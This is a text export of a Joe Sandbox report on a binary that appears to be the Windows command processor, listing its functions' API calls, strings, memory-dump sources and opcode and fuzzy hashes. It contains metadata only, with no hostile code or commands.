                                                                                          • Opcode Fuzzy Hash: 0bf09e208e1b0c6bea64f33002f51ec0bb7d1cb9bc02841e8aeeb1d0e4bcf9a4
                                                                                          • Instruction Fuzzy Hash: B5C1F131E0A783AAF7149B74A4501BD7AA0FF4A751F548139DA1ED77A6DF3CE448A300

                                                                                          Control-flow Graph

                                                                                          • Graph image not preserved in text export; function starts at 7ff6a0e8823c and its nodes call FindFirstFileExW, GetLastError, FindNextFileW, FindClose, GetProcessHeap, HeapAlloc and HeapReAlloc.
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFileFindFirstLast
                                                                                          • String ID:
                                                                                          • API String ID: 873889042-0
                                                                                          • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                          • Instruction ID: 76166c059a0e4b6c045fe78a706f38366120d9a7e3cc253bfad90c1bdf02e995
                                                                                          • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                          • Instruction Fuzzy Hash: 5E514E76A0AB83E6E7108F11E944279BBB1FB8AB91F548131DE1D83361DF3CE454A700

                                                                                          Control-flow Graph

                                                                                          • Graph image not preserved in text export; function starts at 7ff6a0e82978 and its nodes call FindFirstFileW, FindClose, _wcsnicmp, _wcsicmp and memmove, plus internal calls to 7ff6a0e88f80 and 7ff6a0e813e0.
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                          • Instruction ID: a08bc8b71ebd25870bfc35215c9b3a460c066f3dd1fc8cf72c4975d465745b6c
                                                                                          • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                          • Instruction Fuzzy Hash: C8513731B0A683A5EB308F15A9542BAA2A0FF54BA4F484235DE6E877D0DF3CE449D300

                                                                                          Control-flow Graph

                                                                                          • Graph image not preserved in text export; function starts at 7ff6a0e84a14 and its nodes call GetEnvironmentStringsW, GetProcessHeap, HeapAlloc, memmove and FreeEnvironmentStringsW (see APIs below).
                                                                                          APIs
                                                                                          • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A28
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A66
                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A7D
                                                                                          • memmove.MSVCRT(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A9A
                                                                                          • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84AA2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                                                          • String ID:
                                                                                          • API String ID: 1623332820-0
                                                                                          • Opcode ID: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                                                                          • Instruction ID: 6c5731bd2cf5a4169009e10ca608cd6828d385bd8f221c788b61ab3c621e1308
                                                                                          • Opcode Fuzzy Hash: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                                                                          • Instruction Fuzzy Hash: 6A119E72A1AB4392DE149B62A404039BBE0FB8DF81F599039EE4E47784EE3DE8459740

                                                                                          Control-flow Graph

                                                                                          • Graph image not preserved in text export; function starts at 7ff6a0e84d5c (console/command-line initialisation path). The API calls on its nodes are the ones listed under APIs below, including GetModuleHandleW followed by three GetProcAddress calls.
                                                                                          APIs
                                                                                          • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84D9A
                                                                                            • Part of subcall function 00007FF6A0E858E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF6A0E9C6DB), ref: 00007FF6A0E858EF
                                                                                          • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84DBB
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E84DCA
                                                                                          • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84DE0
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E84DEE
                                                                                          • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84E04
                                                                                            • Part of subcall function 00007FF6A0E80580: _get_osfhandle.MSVCRT ref: 00007FF6A0E80589
                                                                                            • Part of subcall function 00007FF6A0E80580: SetConsoleMode.KERNELBASE ref: 00007FF6A0E8059E
                                                                                            • Part of subcall function 00007FF6A0E80580: _get_osfhandle.MSVCRT ref: 00007FF6A0E805AF
                                                                                            • Part of subcall function 00007FF6A0E80580: GetConsoleMode.KERNELBASE ref: 00007FF6A0E805C5
                                                                                            • Part of subcall function 00007FF6A0E80580: _get_osfhandle.MSVCRT ref: 00007FF6A0E805EF
                                                                                            • Part of subcall function 00007FF6A0E80580: GetConsoleMode.KERNELBASE ref: 00007FF6A0E80605
                                                                                            • Part of subcall function 00007FF6A0E80580: _get_osfhandle.MSVCRT ref: 00007FF6A0E80632
                                                                                            • Part of subcall function 00007FF6A0E80580: SetConsoleMode.KERNELBASE ref: 00007FF6A0E80647
                                                                                            • Part of subcall function 00007FF6A0E84A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A28
                                                                                            • Part of subcall function 00007FF6A0E84A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A66
                                                                                            • Part of subcall function 00007FF6A0E84A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A7D
                                                                                            • Part of subcall function 00007FF6A0E84A14: memmove.MSVCRT(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A9A
                                                                                            • Part of subcall function 00007FF6A0E84A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84AA2
                                                                                            • Part of subcall function 00007FF6A0E84AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E78798), ref: 00007FF6A0E84AD6
                                                                                            • Part of subcall function 00007FF6A0E84AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E78798), ref: 00007FF6A0E84AEF
                                                                                            • Part of subcall function 00007FF6A0E85554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF6A0E84E35), ref: 00007FF6A0E855DA
                                                                                            • Part of subcall function 00007FF6A0E85554: RegQueryValueExW.KERNELBASE ref: 00007FF6A0E85623
                                                                                            • Part of subcall function 00007FF6A0E85554: RegQueryValueExW.KERNELBASE ref: 00007FF6A0E85667
                                                                                            • Part of subcall function 00007FF6A0E85554: RegQueryValueExW.KERNELBASE ref: 00007FF6A0E856BE
                                                                                            • Part of subcall function 00007FF6A0E85554: RegQueryValueExW.KERNELBASE ref: 00007FF6A0E85702
                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84E35
                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84E81
                                                                                          • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84F69
                                                                                          • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84F95
                                                                                          • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84FB0
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84FC1
                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84FD8
                                                                                          • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E84FF8
                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E85037
                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E8504B
                                                                                          • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E850DF
                                                                                          • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E850F2
                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E8510F
                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E85130
                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E8514A
                                                                                          • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6A0E85175
                                                                                            • Part of subcall function 00007FF6A0E83578: _get_osfhandle.MSVCRT ref: 00007FF6A0E83584
                                                                                            • Part of subcall function 00007FF6A0E83578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E8359C
                                                                                            • Part of subcall function 00007FF6A0E83578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835C3
                                                                                            • Part of subcall function 00007FF6A0E83578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835D9
                                                                                            • Part of subcall function 00007FF6A0E83578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E835ED
                                                                                            • Part of subcall function 00007FF6A0E83578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6A0E732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6A0E83602
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                                          • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                          • API String ID: 1049357271-3021193919
                                                                                          • Opcode ID: bf394d30a17139001fd3ca4171d3fdfeea46f289a8fe0fe81f1b572c7d274a87
                                                                                          • Instruction ID: e1fbb0b33235ad749c17925de57da7012b0827dccbeddb00b0dae7ab746efb01
                                                                                          • Opcode Fuzzy Hash: bf394d30a17139001fd3ca4171d3fdfeea46f289a8fe0fe81f1b572c7d274a87
                                                                                          • Instruction Fuzzy Hash: A6C14071E0BB43B6EA049B21E9141B9B7A1FF89B91F548135D90EC77A1DF3CE449A340

                                                                                          Control-flow Graph

                                                                                          • Graph image not preserved in text export; function starts at 7ff6a0e83c24 and its nodes call GetCurrentDirectoryW, towupper, iswalpha, GetFullPathNameW, GetFileAttributesW, SetCurrentDirectoryW, GetLastError and _local_unwind, plus internal calls (among them 7ff6a0e82978 and 7ff6a0e8855c).
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
• String ID: :
• API String ID: 1809961153-336475711
• Opcode ID: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
• Instruction ID: b8a44fdce79a4800a4894f883ad31d0925d64bf8fe5ab330c41f98648fe6d147
• Opcode Fuzzy Hash: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
• Instruction Fuzzy Hash: 81D15272B0EB87A1EA64DB25E4542BAB7A1FF84740F444136EA4E837A5DF3CE548D700

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
• String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
• API String ID: 2622545777-4197029667
• Opcode ID: bc67b4ac6c9ae8dc8aa03d7640ce546299fc8a55271f7ee994edb6499b34c01a
• Instruction ID: d4e3c3a7c48bde46850cd103560d19cf9a672123c12e4b060ae0efd296dd3108
• Opcode Fuzzy Hash: bc67b4ac6c9ae8dc8aa03d7640ce546299fc8a55271f7ee994edb6499b34c01a
• Instruction Fuzzy Hash: 9E917071B0BB83A6EF249B60D8642B967A5FF88B85F544135C90E877A5DF3CE509E300

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: ConsoleMode_get_osfhandle
• String ID: CMD.EXE
• API String ID: 1606018815-3025314500
• Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
• Instruction ID: 13592d1b1fc6219afe5a667f5be2c6ddea4e6fd0ee6c223e246dda490559e1cc
• Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
• Instruction Fuzzy Hash: A141B135A0BB83ABE7544B24E855178BBA0FF8EB62F959175D90EC3361DF3CA404A710

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: ConsoleTitlewcschr
• String ID: /$:
• API String ID: 2364928044-4222935259
• Opcode ID: 18b5fc1b2ec7561f4a1e071935b117a16da6c033c327c323cb9fcfc49729d23f
• Instruction ID: e06543d5bb5c77c09212426f39243cc197a4159596bddd93863e3cde5feb2424
• Opcode Fuzzy Hash: 18b5fc1b2ec7561f4a1e071935b117a16da6c033c327c323cb9fcfc49729d23f
• Instruction Fuzzy Hash: 91C1D172E0A643A1FA689B25D4143B962A5FF85B90F448139DA1EC73D2EF3CE845F700

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
• String ID:
• API String ID: 4291973834-0
• Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
• Instruction ID: 7e78bba95abaca0db11812cda2f2204c227f555a0537cf74ebf385dc65f9b8f2
• Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
• Instruction Fuzzy Hash: 2841D831E0E687A6F7549B10EA4027562B1BF58346F644436E95EC77A0DF7CE848E740

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
• String ID:
• API String ID: 1826527819-0
• Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
• Instruction ID: 69c79ed524f9bf397835da6ba45d2db6a92f5ad21214e85c9dd1ea16f9ba29c4
• Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
• Instruction Fuzzy Hash: 8E016D3190A683AAE6005B24A4441B9BBB1FF8E752F545134E54F823A6DF3C94489700
APIs
  • Part of subcall function 00007FF6A0E81EA0: wcschr.MSVCRT(?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF6A0EA0D54), ref: 00007FF6A0E81EB3
• SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF6A0E792AC), ref: 00007FF6A0E830CA
• SetErrorMode.KERNELBASE ref: 00007FF6A0E830DD
• GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E830F6
• SetErrorMode.KERNELBASE ref: 00007FF6A0E83106
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: ErrorMode$FullNamePathwcschr
• String ID:
• API String ID: 1464828906-0
• Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
• Instruction ID: 140ac910e9a6dbf823169bb0a3f970008de1033b6731bafc0565a9932178de45
• Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
• Instruction Fuzzy Hash: 80311332E0A613A6E7649F25A41417EB6A0FB49B94F548235DA5EC33D0DE7DE889A300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset
                                                                                          • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                          • API String ID: 2221118986-3416068913
